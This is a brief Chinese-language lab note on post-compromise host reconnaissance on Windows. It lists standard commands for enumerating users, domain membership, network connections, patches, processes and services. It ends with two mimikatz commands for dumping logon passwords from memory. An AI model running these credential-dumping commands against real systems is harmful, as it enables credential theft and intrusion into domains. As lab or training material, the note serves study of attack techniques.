主机信息收集

实验拓扑

 

查看本地用户

net user

 查看域内用户

net user /domain

 查看在线用户

query user

 查看IP信息，看是否有域控

ipconfig/all

查看arp通信情况，看是否有其他网段网络

arp -a

 查看网络外部连接状态

netstat -ano

 查看DNS服务器

nslookup

 查看系统信息和系统补丁

systeminfo

 查看系统进程

tasklist

 查看系统服务

wmic service list brief

mimikatz 工具获取系统密码

privilege::debug

sekurlsa::logonPasswords